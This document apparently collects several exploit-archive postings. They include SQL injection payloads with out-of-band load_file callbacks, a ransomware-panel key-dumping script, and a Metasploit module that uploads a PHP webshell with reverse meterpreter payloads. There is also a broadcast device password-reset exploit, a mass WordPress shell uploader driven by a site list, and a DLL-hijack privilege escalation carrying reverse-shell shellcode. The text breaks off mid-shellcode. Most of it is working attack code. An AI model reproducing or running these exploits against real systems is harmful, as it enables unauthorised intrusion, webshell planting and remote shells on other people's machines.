<pre><code>## Title: hrm2024.1.0-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 04/02/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The cityedit parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'<br />was submitted in the cityedit parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.<br />The attacker can get all information from the system by using this<br />vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: cityedit (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select<br />load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''<br />ELSE 0x28 END)) AND 'GMzs'='GMzs<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT<br />(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK<br /><br /> Type: time-based blind<br /> Title: MySQL > 5.0.12 AND time-based blind (heavy query)<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,<br />INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR<br />1) AND 'Jtnd'='Jtnd<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)<br /><br />## Time spent:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Jasmin Ransomware arbitrary file read<br /># Date: 2024-04-04<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/codesiddhant/Jasmin-Ransomware<br /># Version: v1.1<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: CVE-2024-30851<br /># Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login<br /># Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main<br />import requests<br />import argparse<br />import os<br />from bs4 import BeautifulSoup<br /><br />def get_file(jasmin_url, filepath):<br /> response = requests.get(<br /> f'{jasmin_url}/download_file.php?file={filepath}',<br /> allow_redirects=False<br /> )<br /><br /> return response.text<br /><br /><br />def get_keys(jasmin_url):<br /> headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br /> }<br /><br /> data = "username=&password='+or+1%3D1+--+-&service=login"<br /> login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)<br /> cookies = login_req.cookies<br /><br /> list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)<br /> soup = BeautifulSoup(list_req.text, 'html.parser')<br /><br /> rows = soup.find_all('tr')<br /><br /> print(f"Dumping decryption keys from {len(rows)-1} victims")<br /> for row in rows:<br /> data = row.find_all('td')<br /> if len(data) == 0:<br /> continue<br /> <br /> username = data[1].get_text()<br /> hostname = data[0].get_text()<br /> filepath = data[7].find('a')['href'].split("=")[1]<br /><br /> print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")<br /><br /><br />parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")<br />subparser = parser.add_subparsers(dest='subcommand')<br /><br />file_parser = subparser.add_parser("getfile", help="Read a file off the server")<br />file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")<br />file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!<br /><br />keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")<br />keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")<br /><br />args = parser.parse_args()<br /><br />if args.subcommand != None:<br /> target_url = args.url.rstrip("/")<br /><br />if args.subcommand == "getkeys":<br /> get_keys(target_url)<br />elif args.subcommand == "getfile":<br /> target_file = args.file.replace("\\", "/").replace("c:", "")<br /> target_path = os.path.join("../../../../../../../../../", target_file)<br /> print(get_file(target_url, target_path))<br />else:<br /> parser.print_help()<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',<br /> 'Description' => %q{<br /> A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower<br /> allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a<br /> POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.<br /> As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,<br /> potentially resulting in complete system compromise, data exfiltration, or unauthorized access<br /> to sensitive information.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability<br /> 'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability<br /> 'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-24725'],<br /> ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],<br /> ['PACKETSTORM', '177635'],<br /> ['EDB', '51903']<br /> ],<br /> 'DisclosureDate' => '2024-03-18',<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => ['php'],<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],<br /> 'Linemax' => 16384,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :windows_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :windows_dropper,<br /> 'Linemax' => 16384,<br /> 'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),<br /> OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),<br /> OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),<br /> OptString.new('PASSWORD', [true, 'Password'])<br /> ])<br /> end<br /><br /> def gibbon_login<br /> # construct multipart login form data<br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('', nil, nil, 'form-data; name="address"')<br /> form_data.add_part('default', nil, nil, 'form-data; name="method"')<br /> form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')<br /> form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')<br /> form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')<br /> form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def construct_form_data(payload)<br /> # construct multipart form data with payload<br /> payload_len = payload.length<br /> payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"<br /><br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')<br /> form_data.add_part('sync', nil, nil, 'form-data; name="mode"')<br /> form_data.add_part('N', nil, nil, 'form-data; name="syncField"')<br /> form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')<br /> form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')<br /> form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')<br /> form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')<br /> form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')<br /> form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')<br /> form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')<br /> form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')<br /> form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')<br /> return form_data<br /> end<br /><br /> def upload_webshell(b64_payload)<br /> # randomize file name if option WEBSHELL is not set<br /> @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")<br /><br /> # create webshell with base64 encoded PHP payload<br /> # works for both windows and linux targets<br /> php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"<br /> form_data = construct_form_data(php_payload)<br /><br /> # upload webshell<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def execute_php(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> res = upload_webshell(payload)<br /> fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200<br /> register_file_for_cleanup(@webshell_name)<br /><br /> # execute webshell<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, @webshell_name),<br /> 'keep_cookies' => true<br /> })<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> form_data = construct_form_data(cmd)<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = send_request_cgi!({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /> return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200<br /><br /> # check if target is running the Gibbon online school platform<br /> # search for the Gibbon version on the login page<br /> return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')<br /><br /> # trying to get the version<br /> version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)<br /> version_number = version[0].split('v') unless version.nil?<br /> if version_number<br /> if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')<br /> return CheckCode::Appears("Gibbon v#{version_number[1]}")<br /> else<br /> return CheckCode::Safe("Gibbon v#{version_number[1]}")<br /> end<br /> end<br /> CheckCode::Detected<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> res = gibbon_login<br /> fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302<br /><br /> case target['Type']<br /> when :php<br /> execute_php(payload.encoded)<br /> when :unix_cmd, :windows_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper, :windows_dropper<br /> # don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/env python<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit<br />#<br />#<br /># Vendor: Positron srl<br /># Product web page: https://www.positron.it<br /># https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/<br /># Affected version: 1.20<br /># TRA7K5_REV107<br /># TRA7K5_REV106<br /># TRA7K5_REV104<br /># TRA7K5_REV102<br />#<br /># Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to<br /># guarantee an excellent quality-price ratio in compliance with current regulations and<br /># intended for individual broadcasters or radio networks. All models in the TRA7000 series<br /># are fully digital, using only high-quality components such as 24-bit A/D and D/A converters<br /># and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output<br /># MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper<br /># for both analogue and digital audio inputs, change-over emergency switching between any<br /># input with adjustable thresholds and intervention times, both in the switching phase on<br /># the secondary source and in the return phase to the primary source. Ethernet connection<br /># with Web-Server (optional) for total control and management of the device. Advanced BYPASS<br /># system between MPX input and outputs, active on operating and power supply anomalies and<br /># can also be activated remotely.<br />#<br /># Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication<br /># bypass through a direct and unauthorized access to the password management functionality.<br /># The vulnerability allows attackers to bypass Digest authentication by manipulating the<br /># password endpoint _Passwd.html and its payload data to set a user's password to arbitrary<br /># value or remove it entirely. This grants unauthorized access to protected areas (/user,<br /># /operator, /admin) of the application without requiring valid credentials, compromising<br /># the device's system security.<br />#<br /># Tested on: Positron Web Server<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2024-5813<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php<br />#<br />#<br /># 22.03.2024<br />#<br />#<br /><br /><br />import requests,sys<br /><br />print("""<br />______________________________________<br />┏┳┓• ┏┓ ┓ ┏┓ ┓ • <br /> ┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋<br /> ┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗<br /> ┛ ┛<br /> for<br /> Positron Digital Signal Processor<br /> ZSL-2024-5813<br />______________________________________<br />""")<br /><br />if len(sys.argv) != 4:<br /> print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")<br /> sys.exit(1)<br /><br />ip = sys.argv[1]<br />ut = sys.argv[2]<br />wa = sys.argv[3]<br /><br />valid_ut = ['user', 'oper', 'admin']<br />if ut.lower() not in valid_ut:<br /> print("Invalid user type! Use 'user', 'oper', or 'admin'.")<br /> sys.exit(1)<br /><br />url = f'http://{ip}/_Passwd.html'<br />did = f'http://{ip}/_Device.html'<br /><br />try:<br /> r = requests.get(did)<br /> if r.status_code == 200 and 'TRA7K5' in r.text:<br /> print("Vulnerable processor found!")<br /> else:<br /> print("Not Vulnerable or not applicable. Exploit exiting.")<br /> sys.exit(1)<br />except requests.exceptions.RequestException as e:<br /> print(f"Error checking device: {e}")<br /> sys.exit(1)<br /><br />headers = {<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'Accept-Language': 'mk-MK,en;q=0.6',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'User-Agent' : 'R-Marina/11.9',<br /> 'Accept' : '*/*'<br />}<br /><br />payload = {}<br />if wa.lower() == 'erase':<br /> payload[f'PSW_{ut.capitalize()}'] = 'NONE'<br />else:<br /> payload_key = f'PSW_{ut.capitalize()}'<br /> payload[payload_key] = wa<br /> #print(payload)<br /><br />r = requests.post(url, headers=headers, data=payload)<br />print(r.status_code)<br />print(r.text)<br /></code></pre>
<pre><code># Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)<br /># Exploit Author: Yusuf DİNÇ<br /># Google Dork: NA<br /># Date: 05/03/2024<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link:<br />https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/<br /># Version: 3.2<br /># Tested on: Linux<br /><br /><br />POST /test/loginsystem/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 53<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/test/loginsystem/login.php<br />Cookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hv<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />uemail=test%40gmail.com'+OR+1=1#&password=test&login=<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)<br /># Date: 2024-02-25<br /># Author: Milad Karimi (Ex3ptionaL)<br /># Category : webapps<br /># Tested on: windows 10 , firefox<br /><br />import sys , requests, re , json<br />from multiprocessing.dummy import Pool<br />from colorama import Fore<br />from colorama import init<br />init(autoreset=True)<br /><br />headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',<br />'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;<br />Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like<br />Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':<br />'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br />'Accept-Encoding': 'gzip, deflate', 'Accept-Language':<br />'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}<br /><br />uploader = """<br />GIF89a<br /><?php ?><br /><!DOCTYPE html><br /><html><br /><head><br /> <title>Resultz</title><br /></head><br /><body><h1>Uploader</h1><br /> <form enctype='multipart/form-data' action='' method='POST'><br /> <p>Uploaded</p><br /> <input type='file' name='uploaded_file'></input><br /><br /> <input type='submit' value='Upload'></input><br /> </form><br /></body><br /></html><br /><?PHP<br />if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo<br />base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo<br />base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?><br />"""<br />requests.urllib3.disable_warnings()<br /><br />def Exploit(Domain):<br /> try:<br /> if 'http' in Domain:<br /> Domain = Domain<br /> else:<br /> Domain = 'http://'+Domain<br /> myup = {'': ('db.php', uploader)}<br /> req = requests.post(Domain +<br />'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',<br />files=myup, headers=headers,verify=False, timeout=10).text<br /> req1 = requests.get(Domain +<br />'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')<br /> if 'Ex3ptionaL' in req1:<br /> print (fg+'[+] '+ Domain + ' --> Shell Uploaded')<br /> open('Shellz.txt', 'a').write(Domain +<br />'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')<br /> else:<br /> print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')<br /> except:<br /> print(fr+' -| ' + Domain + ' --> {} [Failed]')<br /><br />target = open(input(fm+"Site List: "), "r").read().splitlines()<br />mp = Pool(int(input(fm+"Threads: ")))<br />mp.map(Exploit, target)<br />mp.close()<br />mp.join()<br /></code></pre>
<pre><code># Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation <br /># Date: 03.04.2024<br /># Author: M. Akil Gündoğan <br /># Vendor Homepage: https://superantispyware.com/<br /># Version: 10.0.1262 and lastest version 10.0.1264<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/FM5XlZPdvdo<br /># CVE ID: CVE-2024-27518<br /><br /># Vulnerability Description:<br />--------------------------------------<br />SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the "C:\Program Files\SUPERAntiSpyware" folder via an NTFS directory junction, as demonstrated by a crafted version.dll file that is detected as malware. Since SASCore64.exe has a DLL Hijacking vulnerability for "version.dll", a shell is obtained as NT AUTHORITY\SYSTEM after system reboot.<br /><br />Technical details and step by step Proof of Concept's (PoC):<br /><br />1 - ​A malicious version.dll file containing shellcode is created.<br /><br />2 - If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.<br /><br />3 - Create a new folder and copy the prepared "version.dll" into it. Then the folder is scanned and SUPERAntiSpyware quarantines the DLL.<br /><br />4 - Using "CreateMountPoint.exe" among the "Symbolic Link Testing" tools provided by Google, the path where "version.dll" is quarantined is mounted in the "C:\Program Files\SUPERAntiSpyware" directory. These tools are available at the following link (https://github.com/googleprojectzero/symboliclink-testing-tools) or you can use the mklink command to do the same thing. <br /><br />5 - When the quarantined "version.dll" is restored, it will be copied to SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe will execute the shellcode in "version.dll" and open a session with NT AUTHORITY\SYSTEM privileges for the attacker.<br /><br /># Mitigations:<br />--------------------------------------<br />We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed. <br /><br /># Timeline:<br />--------------------------------------<br />- 18.02.2024 - Vulnerability reported via email but vendor refused to fix it.<br />- 03.04.2024 - Full disclosure.<br /><br /># References<br />--------------------------------------<br />- Vendor: https://www.superantispyware.com/<br />- CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518<br />- Repository: https://github.com/secunnix/CVE-2024-27518/<br /><br /># DLLMain:<br />-------------------------------------------------------------------------------------------------------------------------<br /><br />/* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp <br />M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team<br />Special Thanks: Safa Karakus and Samet Gozet<br /> <br />If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, <br />it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" <br />to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.<br /><br />Compile as release x64 DLL.<br />*/<br /><br />#include "windows.h"<br />#include "ios"<br />#include "fstream"<br />#include <iostream><br /><br />#pragma once<br />#pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1")<br />#pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2")<br />#pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3")<br />#pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8")<br />#pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9")<br />#pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10")<br />#pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11")<br />#pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12")<br />#pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13")<br />#pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14")<br />#pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15")<br />#pragma comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16")<br />#pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17")<br /><br />// Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c<br />unsigned char shellcode[] =<br />"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"<br />"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"<br />"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"<br 